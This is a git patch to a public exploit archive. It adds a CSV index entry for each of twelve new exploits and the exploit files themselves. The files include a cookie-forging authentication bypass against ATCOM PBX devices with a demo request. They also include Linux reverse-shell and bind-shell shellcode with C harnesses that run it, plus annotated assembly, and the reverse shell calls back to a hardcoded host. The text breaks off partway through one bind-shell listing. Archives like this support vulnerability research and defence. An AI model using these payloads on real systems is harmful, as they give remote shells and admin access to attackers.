From 2815f48e2551ef739abb89be50461b28bd6526b2 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 17 Jun 2016 05:05:00 +0000 Subject: [PATCH] DB: 2016-06-17 12 new exploits Linux x86_64 - Reverse Shell Shellcode Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal Solarwinds Virtualization Manager - Privilege Escalation Blat 3.2.14 - Stack Overflow Linux/x86 - Bindshell with Configurable Port - 87 bytes Linux x86_64 Shellcode Null-Free Reverse TCP Shell Linux x86 TCP Bind Shell Port 4444 (656 bytes) Tiki-Wiki CMS Calendar 14.2_ 12.5 LTS_ 9.11 LTS_ and 6.15 - Remote Code Execution Linux/Windows/BSD x86_64 execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode ATCOM PBX IP01_ IP08 _ IP4G_ IP2G4A - Authentication Bypass Roxy Fileman 1.4.4 - Arbitrary File Upload SlimCMS 0.1 - CSRF (Change Admin Password) --- files.csv | 12 + platforms/hardware/webapps/39962.txt | 45 +++ platforms/lin_x86-64/shellcode/39578.c | 84 ++++++ platforms/lin_x86-64/shellcode/39844.c | 83 +++++ platforms/lin_x86/shellcode/39815.c | 192 ++++++++++++ platforms/lin_x86/shellcode/39851.c | 278 +++++++++++++++++ platforms/linux/local/39967.txt | 51 ++++ platforms/multiple/shellcode/39885.c | 401 +++++++++++++++++++++++++ platforms/php/webapps/39963.txt | 27 ++ platforms/php/webapps/39964.html | 47 +++ platforms/php/webapps/39965.txt | 26 ++ platforms/windows/dos/39966.txt | 48 +++ platforms/windows/webapps/39968.txt | 99 ++++++ 13 files changed, 1393 insertions(+) create mode 100755 platforms/hardware/webapps/39962.txt create mode 100755 platforms/lin_x86-64/shellcode/39578.c create mode 100755 platforms/lin_x86-64/shellcode/39844.c create mode 100755 platforms/lin_x86/shellcode/39815.c create mode 100755 platforms/lin_x86/shellcode/39851.c create mode 100755 platforms/linux/local/39967.txt create mode 100755 platforms/multiple/shellcode/39885.c create mode 100755 platforms/php/webapps/39963.txt create mode 100755 platforms/php/webapps/39964.html create mode 100755 platforms/php/webapps/39965.txt create mode 100755 platforms/windows/dos/39966.txt create mode 100755 platforms/windows/webapps/39968.txt diff --git a/files.csv b/files.csv index 03f1c7ea5..ee150be37 100755 --- a/files.csv +++ b/files.csv @@ -35792,6 +35792,7 @@ id,file,description,date,author,platform,type,port 39575,platforms/php/webapps/39575.txt,"WordPress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 39576,platforms/php/webapps/39576.txt,"WordPress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 39577,platforms/php/webapps/39577.txt,"WordPress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80 +39578,platforms/lin_x86-64/shellcode/39578.c,"Linux x86_64 - Reverse Shell Shellcode",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0 39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit",2016-03-21,"Rakan Alotaibi",windows,local,0 39580,platforms/php/webapps/39580.txt,"Disc ORGanizer - DORG - Multiple Vulnerabilities",2016-03-21,SECUPENT,php,webapps,80 39581,platforms/hardware/webapps/39581.txt,"D-Link DWR-932 Firmware 4.00 - Authentication Bypass",2016-03-21,"Saeed reza Zamanian",hardware,webapps,80 @@ -35882,6 +35883,7 @@ id,file,description,date,author,platform,type,port 39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80 39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80 39680,platforms/windows/local/39680.txt,"CAM UnZip 5.1 - Archive Path Traversal",2016-04-11,hyp3rlinx,windows,local,0 +39968,platforms/windows/webapps/39968.txt,"Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal",2016-06-16,LiquidWorm,windows,webapps,1947 39682,platforms/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",php,webapps,80 39683,platforms/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,hardware,webapps,80 39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0 @@ -35901,6 +35903,7 @@ id,file,description,date,author,platform,type,port 39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86_64 - Read /etc/passwd - 65 bytes",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0 39701,platforms/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,cgi,webapps,443 39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation",2016-04-15,metasploit,linux,local,0 +39967,platforms/linux/local/39967.txt,"Solarwinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0 39704,platforms/php/webapps/39704.txt,"WordPress leenk.me Plugin 2.5.0 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80 39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0 @@ -35984,6 +35987,7 @@ id,file,description,date,author,platform,type,port 39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC",2016-05-09,"Nipun Jaswal",windows,dos,0 39791,platforms/multiple/local/39791.rb,"ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,metasploit,multiple,local,0 39792,platforms/ruby/remote/39792.rb,"Ruby on Rails Development Web Console (v2) Code Execution",2016-05-09,metasploit,ruby,remote,3000 +39966,platforms/windows/dos/39966.txt,"Blat 3.2.14 - Stack Overflow",2016-06-16,Vishnu,windows,dos,0 39794,platforms/windows/shellcode/39794.c,"All Windows Null-Free Shellcode - Functional Keylogger to File - 601 (0x0259) bytes",2016-05-10,Fugu,windows,shellcode,0 39795,platforms/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash PoC",2016-05-10,"Mohammad Reza Espargham",windows,dos,0 39796,platforms/windows/dos/39796.py,"Ipswitch WS_FTP LE 12.3 - Search field SEH Overwrite POC",2016-05-10,"Zahid Adeel",windows,dos,0 @@ -36004,6 +36008,7 @@ id,file,description,date,author,platform,type,port 39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0 39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80 39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0 +39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port - 87 bytes",2016-05-16,JollyFrogs,lin_x86,shellcode,0 39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - Archive Path Traversal",2016-05-16,hyp3rlinx,php,webapps,0 39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0 39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC",2016-05-16,HauntIT,windows,dos,0 @@ -36030,12 +36035,14 @@ id,file,description,date,author,platform,type,port 39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0 39842,platforms/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos,0 39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Local Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0 +39844,platforms/lin_x86-64/shellcode/39844.c,"Linux x86_64 Shellcode Null-Free Reverse TCP Shell",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0 39845,platforms/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Local Privilege Escalation",2016-05-23,LiquidWorm,windows,local,0 39846,platforms/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,windows,dos,0 39847,platforms/lin_x86-64/shellcode/39847.c,"Linux x86_64 Information Stealer Shellcode",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80 39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443 39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80 +39851,platforms/lin_x86/shellcode/39851.c,"Linux x86 TCP Bind Shell Port 4444 (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0 39852,platforms/java/remote/39852.rb,"Oracle ATS Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088 39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,metasploit,unix,remote,443 39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0 @@ -36060,11 +36067,13 @@ id,file,description,date,author,platform,type,port 39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0 39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80 39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0 +39965,platforms/php/webapps/39965.txt,"Tiki-Wiki CMS Calendar 14.2_ 12.5 LTS_ 9.11 LTS_ and 6.15 - Remote Code Execution",2016-06-16,"Dany Ouellet",php,webapps,80 39879,platforms/php/webapps/39879.txt,"Joomla SecurityCheck Extension 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80 39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Stored XSS",2016-06-02,"Fernando Câmara",jsp,webapps,0 39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706_ 1.5.1_ 1.5.3 - Unauthenticated File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80 39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0 39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - CSRF Add Admin Exploit",2016-06-06,"Ali Ghanbari",php,webapps,80 +39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode",2016-06-06,odzhancode,multiple,shellcode,0 39886,platforms/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps,0 39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit",2016-06-06,lastc0de,cgi,webapps,80 39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,gsX,windows,local,0 @@ -36139,3 +36148,6 @@ id,file,description,date,author,platform,type,port 39959,platforms/windows/dos/39959.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos,0 39960,platforms/windows/dos/39960.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos,0 39961,platforms/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos,0 +39962,platforms/hardware/webapps/39962.txt,"ATCOM PBX IP01_ IP08 _ IP4G_ IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,hardware,webapps,80 +39963,platforms/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",php,webapps,80 +39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - CSRF (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80 diff --git a/platforms/hardware/webapps/39962.txt b/platforms/hardware/webapps/39962.txt new file mode 100755 index 000000000..f36bf5b8f --- /dev/null +++ b/platforms/hardware/webapps/39962.txt @@ -0,0 +1,45 @@ +# Title: ATCOM PBX system , auth bypass exploit +# Author: i-Hmx +# contact : n0p1337@gmail.com +# Home : sec4ever.com +# Tested on : ATCOM IP01 , IP08 , IP4G and ip2G4A + +Details +The mentioned system is affected by auth bypass flaw that allow an attacker to get admin access on the vulnerable machine without perior access +The security check is really stupid , depend on js +affected lines + +js/util.js +function alertWithoutLogin(){ + var username = getCookie("username"); + //alert(username); + if(!!!username){ + alert('Sorry, permission denied. Please login first!'); + } +} + +so actually it just check if username value exist in cookies +and if not , redirect to login.html +just like that!!!!!!!!!!!!! + +exploitation?! +just from browser , press f12 , open console +type document.cookie="username=admin" +or from burp intercept proxy and set the cookies as well +go to ip/admin/index.html +and you are in , simple like that :/ + +Demo request + +GET /admin/index.html HTTP/1.1 +Host: 192.168.44.12 +User-Agent: Mozilla/1.0 (Windows NT 3.3; WOW32; rv:60.0) Gecko/20010101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: username=admin +Connection: close +Upgrade-Insecure-Requests: 1 + +From Eg-R1z with love +./Faris \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/39578.c b/platforms/lin_x86-64/shellcode/39578.c new file mode 100755 index 000000000..1aaa59f97 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/39578.c @@ -0,0 +1,84 @@ +/* +# Exploit Title: Shellcode [Linux x86_64 Reverse Shell] +# Date: 19/03/2016 +# Shellcode Author: Sudhanshu Chauhan +# LinkedIn: https://in.linkedin.com/in/sudhanshuchauhan +# Tested on: [Ubuntu 14.04.1 x86_64] + +global _start + + +_start: + + ;Socket + xor rax, rax + xor rdi, rdi + xor rsi, rsi + xor rdx, rdx + add rax, 41 + add rdi, 2 + add rsi, 1 + syscall + + ; copy socket descriptor + mov rdi, rax + + ; Socket details IP- 192.168.1.2 Port- 1234 + xor rax, rax + push rax + mov dword [rsp-4], 0x0201a8c0 + mov word [rsp-6], 0xd204 + sub rsp, 6 + push word 0x2 + + + ;connect + xor rax, rax + xor rdx, rdx + add rax, 42 + mov rsi, rsp + add rdx, 16 + syscall + + + ;duplicate sockets + xor rax, rax + add rax, 33 + xor rsi, rsi + syscall + + mov al, 33 + add rsi, 1 + syscall + + mov al, 33 + add rsi, 1 + syscall + + ; execve + xor rax, rax + push rax + mov rbx, 0x68732f2f6e69622f + push rbx + mov rdi, rsp + push rax + mov rdx, rsp + push rdi + mov rsi, rsp + add rax, 59 + syscall + +*/ + +#include +#include +unsigned char code[] = \ +"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x29\x48\x83\xc7\x02\x48\x83\xc6\x01\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\xc7\x44\x24\xfc\xc0\xa8\x01\x02\x66\xc7\x44\x24\xfa\x04\xd2\x48\x83\xec\x06\x66\x6a\x02\x48\x31\xc0\x48\x31\xd2\x48\x83\xc0\x2a\x48\x89\xe6\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"; + +main() +{ + printf("Shellcode Length: %d\n", (int)sizeof(code)-1); + int (*ret)() = (int(*)())code; + ret(); +} + diff --git a/platforms/lin_x86-64/shellcode/39844.c b/platforms/lin_x86-64/shellcode/39844.c new file mode 100755 index 000000000..b1b6609b4 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/39844.c @@ -0,0 +1,83 @@ +/* +# Exploit Title: Shellcode [Linux x86_64 Reverse Shell] +# Date: 19/03/2016 +# Shellcode Author: Sudhanshu Chauhan +# LinkedIn: https://in.linkedin.com/in/sudhanshuchauhan +# Tested on: [Ubuntu 14.04.1 x86_64] + +global _start + + +_start: + + ;Socket + xor rax, rax + xor rdi, rdi + xor rsi, rsi + xor rdx, rdx + add rax, 41 + add rdi, 2 + add rsi, 1 + syscall + + ; copy socket descriptor + mov rdi, rax + + ; Socket details IP- 192.168.1.2 Port- 1234 + xor rax, rax + push rax + mov dword [rsp-4], 0x0201a8c0 + mov word [rsp-6], 0xd204 + sub rsp, 6 + push word 0x2 + + + ;connect + xor rax, rax + xor rdx, rdx + add rax, 42 + mov rsi, rsp + add rdx, 16 + syscall + + + ;duplicate sockets + xor rax, rax + add rax, 33 + xor rsi, rsi + syscall + + mov al, 33 + add rsi, 1 + syscall + + mov al, 33 + add rsi, 1 + syscall + + ; execve + xor rax, rax + push rax + mov rbx, 0x68732f2f6e69622f + push rbx + mov rdi, rsp + push rax + mov rdx, rsp + push rdi + mov rsi, rsp + add rax, 59 + syscall + +*/ + +#include +#include +unsigned char code[] = \ +"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x29\x48\x83\xc7\x02\x48\x83\xc6\x01\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\xc7\x44\x24\xfc\xc0\xa8\x01\x02\x66\xc7\x44\x24\xfa\x04\xd2\x48\x83\xec\x06\x66\x6a\x02\x48\x31\xc0\x48\x31\xd2\x48\x83\xc0\x2a\x48\x89\xe6\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"; + +main() +{ + printf("Shellcode Length: %d\n", (int)sizeof(code)-1); + int (*ret)() = (int(*)())code; + ret(); +} \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/39815.c b/platforms/lin_x86/shellcode/39815.c new file mode 100755 index 000000000..7e9997f8c --- /dev/null +++ b/platforms/lin_x86/shellcode/39815.c @@ -0,0 +1,192 @@ +/*===================================================================*/ +/* + Filename: bindshell.c + Author: JollyFrogs (LookoutFrog@gmail.com) + + License: This work is licensed under a Creative Commons + Attribution-NonCommercial 4.0 International License. + + Compile: + gcc -m32 -fno-stack-protector -z execstack bindshell.c -o bindshell +*/ + +#include +#include +#include + +unsigned char shellcode[] = \ +"\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97" +"\x5b\x58\x66\xb8\x15\xb3\x66\x50\x66\x53\x89\xe1\x31\xc0\xb0\x10" +"\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x50\x57\xb0\x66\x43\x43\x89" +"\xe1\xcd\x80\xb0\x66\x43\xcd\x80\x93\x87\xcf\x49\xb0\x3f\xcd\x80" +"\x75\xf9\x50\x59\x50\x5a\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f" +"\x62\x69\x6e\x87\xe3\xcd\x80"; + +static bool shellcode_zerocheck() { + // initialize counter + int i = 0; + // check each byte in shellcode array for hexidecimal zero value, return false if zero found + for(i = 0; i < sizeof(shellcode)-1; i++) {if (shellcode[i] == '\x00') return false;} + // Return true if no zeroes found + return true; +} + +static bool shellcode_setport(char *buf, int port) { + // Check if decimal port is valid + if (port<1024 || port>65535) return false; + // The offset of the port is 21, but reduce by 1 since the array counts from 0 + int shellcode_port_offset = 20; // (\x15\xb3) + // convert decimal port to hexidecimal + *(short *)(buf+shellcode_port_offset) = port; // (\x15\xb3) - shellcode array counts from 0 + // Swap port bytes to accomodate for Little Endian memory structure + char tmp = buf[shellcode_port_offset]; + buf[shellcode_port_offset] = buf[shellcode_port_offset+1]; + buf[shellcode_port_offset+1] = tmp; + // Check if the hexidecimal port contains zeroes, if it does then show an error + if (shellcode[20] == '\x00' || shellcode[21] == '\x00') { + printf("port HEX contains zeroes\n"); return false; + } + // Return true if all checks passed + return true; +} + +main () { + // Port in decimal - should be higher than 1024 and lower than 65536 + int port = 1234; + // Basic error checking + if (!shellcode_setport(shellcode, port)) {printf("ERROR: Invalid port\n");return 0;} + if (!shellcode_zerocheck()) {printf("ERROR: Shellcode contains zeroes\n");return 0;} + // Print shellcode length. + printf("Shellcode Length: %d\n", strlen(shellcode)); + // Run assembly commands + __asm__ ( + // Initialize registers + "movl $0x12345678, %eax\n\t" + "movl $0x12345678, %ebx\n\t" + "movl $0x12345678, %ecx\n\t" + "movl $0x12345678, %edx\n\t" + "movl $0x12345678, %edi\n\t" + "movl $0x12345678, %esi\n\t" + "movl $0x12345678, %ebp\n\t" + // execute shellcode + "jmp shellcode"); +} + +/* Assembly source of shellcode: + +global _start + +section .text +_start: + ; parameters for SOCKET(2) are placed on the stack in reverse order + ; SOCKET(2) Synopsis: int socket(int domain, int type, int protocol); + ; Before instruction "int 0x80" the stack should look like: + ; 02 00 00 00 01 00 00 00 00 00 00 00 + ; ^AF_INET ^S_STREAM ^TCP + + xor eax, eax ; EAX = 00000000 + push eax ; PUSH 00000000 (TCP) + inc eax ; EAX = 00000001 + push eax ; PUSH 00000001 (SOCK_STREAM) + pop ebx ; EBX = 00000001 (SOCKETCALL.SOCKET) + push eax ; PUSH 00000001 (SOCK_STREAM) + inc eax ; EAX = 00000002 + push eax ; PUSH 00000002 (AF_INET) + + ; invoke socketcall to create the socket + mov al, 0x66 ; EAX = 00000066 (SOCKETCALL) + + mov ecx, esp ; ECX = points to top of stack (0xBFFFF3E4) + + int 0x80 ; SYSCALL SOCKETCALL(2)-SOCKET(2) + + xchg edi, eax ; store fd in edi + + ; parameters for BIND(2) are placed on the stack in reverse order + ; BIND(2) Synopsis: int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen); + ; Before instruction "int 0x80" the stack should look like: + ; 07 00 00 00 xx xx xx xx 10 00 00 00 02 00 b3 15 00 00 00 00 + ; ^FD ^ ^structlen ^AFNT ^port ^in_addr + ; | PTR to ---------------^ + + pop ebx ; EBX = 00000002 (SOCKETCALL.BIND) + pop eax ; EAX = 00000001 + ; Note: Stack = 00000000 + mov ax, 0xB315 ; EAX = 0000B315 (5555 reversed) + push ax ; PUSH B315 (sockaddr_2) + push bx ; PUSH 0002 (sockaddr_3) + mov ecx, esp ; ECX = ESP (0xBFFFF3E8) + xor eax, eax ; EAX = 00000000 + mov al, 0x10 ; EAX = 00000010 + push eax ; PUSH 00000010 (len(sockaddr)) + push ecx ; PUSH (*ADDR) (ptr to sockaddr) + push edi ; push (FD) (SOCKFD) + + ; invoke socketcall to bind the socket to IP and port + mov al, 0x66 ; EAX = 00000066 (SOCKETCALL) + mov ecx, esp ; ECX = points to top of stack (0xBFFFF3DC) + + int 0x80 ; SYSCALL SOCKETCALL(2)-BIND(2) + + ; parameters for LISTEN(2) are placed on the stack in reverse order + ; LISTEN(2) Synopsis: listen(int sockfd, int backlog) + ; Before instruction "int 0x80" the stack should look like: + ; 07 00 00 00 00 00 00 00 + ; ^FD ^Backlog = 0 + + ; Note that EAX = 00000000 due to return code from SOCKETCALL above + push eax ; PUSH 00000000 (Backlog) + push edi ; PUSH (FD) (SOCKFD) + + ; invoke socketcall to set the socket in listen mode + mov al, 0x66 ; EAX = 00000066 (SOCKETCALL) + inc ebx ; EBX = 00000003 + inc ebx ; EBX = 00000004 (SOCKETCALL.LISTEN) + mov ecx, esp ; ECX = points to top of stack (0xBFFFF3D4) + int 0x80 ; SYSCALL SOCKETCALL(2)-LISTEN(2) + ; Note: The selected port is opened on the system and listening + + ; parameters for ACCEPT(2) are placed on the stack in reverse order + ; ACCEPT(2) Synopsis: int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen); + ; Before instruction "int 0x80" the stack should look like: + ; 07 00 00 00 00 00 00 00 00 00 00 00 + + ; Note that EAX is set to 0 upon successful execution of SOCKETCALL.LISTEN + ; Note that stack at 0xBFFFF3D4 already contains what I need: + ; 07 00 00 00 00 00 00 00 00 00 00 00 + ; invoke socketcall to set the socket to accept connections + mov al, 0x66 ; EAX = 00000066 (SOCKETCALL) + inc ebx ; EBX = 00000005 (SOCKETCALL.ACCEPT) + int 0x80 ; SYSCALL SOCKETCALL(2)-ACCEPT(2) + + ; use syscal DUP2(2) to copy the stdin(0), stdout(1) and stderr(2) + ; DUP2(2) Synopsis: int dup2(int oldfd, int newfd); + xchg eax, ebx ; EBX = CFD, EAX = 00000005 + xchg ecx, edi ; ECX = 00000007 + ; XCHG ECX, EDI saves us having to zero out ecx and then MOV 3 + +redirect: + dec ecx ; ECX = 00000002 (eventually) + mov al, 0x3f ; DUP2(2) (3 times - ECX=2, ECX=1, ECX=0) + int 0x80 ; SYSCALL DUP2(2) (ECX=2, ECX=1, ECX=0) + jnz redirect ; + + ; spawn /bin/sh shell + ; Note that EAX is set to 00000000 upon last succesful execution of DUP2 + push eax ; PUSH 00000000 (NULL byte) + pop ecx ; ECX = 00000000 (EXECVE ARGV) + push eax ; PUSH 00000000 (NULL byte) + pop edx ; EDX = 00000000 (EXECVE ENVP) + + ; push '/bin//sh, 0' on stack + push eax ; PUSH 00000000 (NULL byte) + mov al, 0xb ; EXECVE(2) + push 0x68732f2f ; "//sh" + push 0x6e69622f ; "/bin" + + xchg esp, ebx ; Save a byte by sacrificing unneeded ESP + + int 0x80 ; Start /bin/sh in the client socket FD +*/ + +/*===================================================================*/ \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/39851.c b/platforms/lin_x86/shellcode/39851.c new file mode 100755 index 000000000..62f0d3aa7 --- /dev/null +++ b/platforms/lin_x86/shellcode/39851.c @@ -0,0 +1,278 @@ +// Title: Linux X86 Bind TCP:4444 (656 bytes) +// Author: Brandon Dennis +// Contact: bdennis@mail.hodges.edu +// Date: 5/24/2016 +// ASM Source: https://github.com/slyth11907/x86-ASM-Linux-Intel/blob/master/Code-Examples/ShellCode/execve-stack-bind.asm + +/* +; Filename: execve-stack-bind.asm +; Author: Brandon Dennis +; Date: 5/24/2016 + +; execve +; execve takes 3 arguments +; 1: filename: EX /bin/bash, 0x0 +; 2: arguments for the executable(1st arg should be the filename then 2nd arg should be null or 0x0000) +; 3: envp is used for env settings, we can leave this as null: EX 0x0000 + +; Python code to get the instruction in HEX of the string reversed to place into the stack +; python -c 'string="//etc/shadow";splitNum=8;print "\nLength: %s" % len(string[::-1]);string=string[::-1].encode("hex"); \ +; string=["push 0x"+str(string[i:i+splitNum]) for i in range(0, len(string), splitNum)]; \ +; print "Hex List:\n"; print("\n".join(h for h in string))' + + +; Port: 4444 (\x5c\x11) in shellcode +; ShellCode--- +; "\x31\xc0\x50\x66\xb8\x66\x00\x31\xdb\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80 +; \x89\xc2\x31\xc0\x66\xb8\x66\x00\x31\xdb\xb3\x14\x6a\x04\x54\x6a\x02\x6a\x01 +; \x52\x89\xe1\xcd\x80\x31\xc0\x66\xb8\x66\x00\x31\xdb\x53\xb3\x02\x66\x68\x11 +; \x5c\x66\x6a\x02\x89\xe1\x6a\x16\x51\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53 +; \x66\xb8\x66\x00\xb3\x04\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53\x53\x66\xb8 +; \x66\x00\xb3\x05\x52\x89\xe1\xcd\x80\x89\xc2\x31\xc0\x31\xc9\xb0\x3f\x89\xd3 +; \xcd\x80\x31\xc0\x31\xc9\xb0\x3f\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\xb1\x02\xcd +; \x80\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f +; \x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" +; ShellCode--- +; Bytes: 656 +; Tested on: Linux 3.13.0-32, Ubuntu 12.04.5 LTS, X86 + + +global _start + +section .text + +_start: + + + ; Create the socket FD + ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP) + xor eax, eax + push eax ; this is for our first arg as it is needing be be 0 for IPPROTO_IP + mov ax, 102 ; moves syscall for socketcall into ax + xor ebx, ebx ; 0's out ebx + mov bl, 0x1 ; setting the 